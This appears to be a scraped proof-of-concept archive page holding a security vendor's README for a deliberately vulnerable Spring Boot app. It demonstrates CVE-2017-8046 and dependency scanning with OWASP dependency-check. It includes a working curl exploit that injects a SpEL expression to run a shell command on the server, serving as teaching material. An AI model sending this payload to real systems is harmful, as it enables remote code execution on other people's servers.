来源

关联漏洞

介绍

<p align="center"><a href="https://www.verygoodsecurity.com/"><img src="https://avatars0.githubusercontent.com/u/17788525" width="128" alt="VGS Logo"></a></p>

_**DISCLAIMER:** This repository is supplementary to the VGS blog post,
[How to Avoid "Using Components with Known Vulnerabilities"](https://develop--vgsblog.netlify.com/posts/how-to-avoid-using-components-with-known-vulnerabilities/).
It contains an application with a known security vulnerability (namely,
[CVE-2017-8046](https://pivotal.io/security/cve-2017-8046)), as well as the
description of how to exploit it. Use the application at your own risk!_

## Setting Up

First, start the application by executing the following command from the root of the repository:

```bash
mvn clean spring-boot:run
```

Second, create a resource by sending a `POST` request like this:

```bash
curl -X POST http://localhost:8080/books \
  -H 'Content-Type: application/json' \
  -d '{"isbn":"978-3827268969","title":"Thinking in Java","author":"Bruce Eckel"}'
```

## Exploiting the Vulnerability

```bash
curl -X PATCH http://localhost:8080/books/1 -H 'Content-Type: application/json-patch+json' -d '[{"op":"replace","path":"T(org.springframework.util.StreamUtils).copy(T(java.lang.Runtime).getRuntime().exec(\"ifconfig\").getInputStream(),T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes().getResponse().getOutputStream()).x","value":"Your application has been hacked"}]'
```

Provided you're running the application on a Unix-based operation system (e.g.
macOS), a response will contain the host's network configuration. In fact, any
[SpEL](https://docs.spring.io/spring/docs/current/spring-framework-reference/core.html#expressions)
expression can be used.

## Checking Vulnerable Dependencies

```bash
mvn clean package verify
```

The build will fail as there's a dependency identified with a high-risk
vulnerability:

```
[ERROR] Failed to execute goal org.owasp:dependency-check-maven:3.3.2:check (default) on project CVE-2017-8046:
[ERROR]
[ERROR] One or more dependencies were identified with vulnerabilities that have a CVSS score greater than or equal to '7.0':
[ERROR]
[ERROR] spring-boot-1.5.5.RELEASE.jar: CVE-2017-8046
[ERROR] spring-core-4.3.10.RELEASE.jar: CVE-2018-1275, CVE-2018-1270
[ERROR] jackson-databind-2.8.9.jar: CVE-2017-15095, CVE-2017-17485, CVE-2018-7489
[ERROR] spring-boot-starter-data-rest-1.5.5.RELEASE.jar: CVE-2018-1273, CVE-2017-8046
[ERROR]
[ERROR] See the dependency-check report for more details.
```

## What is VGS?

_**Want to just jump right in?** Check out our [getting started
guide](https://www.verygoodsecurity.com/docs/getting-started)._

Very Good Security (VGS) allows you to enhance your security standing while
maintaining the utility of your data internally and with third-parties. As an
added benefit, we accelerate your compliance certification process and help you
quickly obtain security-related compliances that stand between you and your
market opportunities.

To learn more, visit us at https://www.verygoodsecurity.com/

## License

This project is licensed under the MIT license. See the [LICENSE](LICENSE) file
for details.

文件快照

 [4.0K]  /data/pocs/b3f77c5cdc1d7c7bbb6f6dea9a422017c3ca1e9d
├── [1.1K]  LICENSE
├── [2.3K]  pom.xml
├── [3.1K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  verygoodsecurity
        │           ├── [ 643]  Application.java
        │           └── [4.0K]  domain
        │               ├── [1.3K]  AuditableEntity.java
        │               ├── [ 879]  Book.java
        │               └── [4.0K]  repository
        │                   └── [ 673]  BookRepository.java
        └── [4.0K]  resources
            └── [ 128]  application.yml

8 directories, 8 files

备注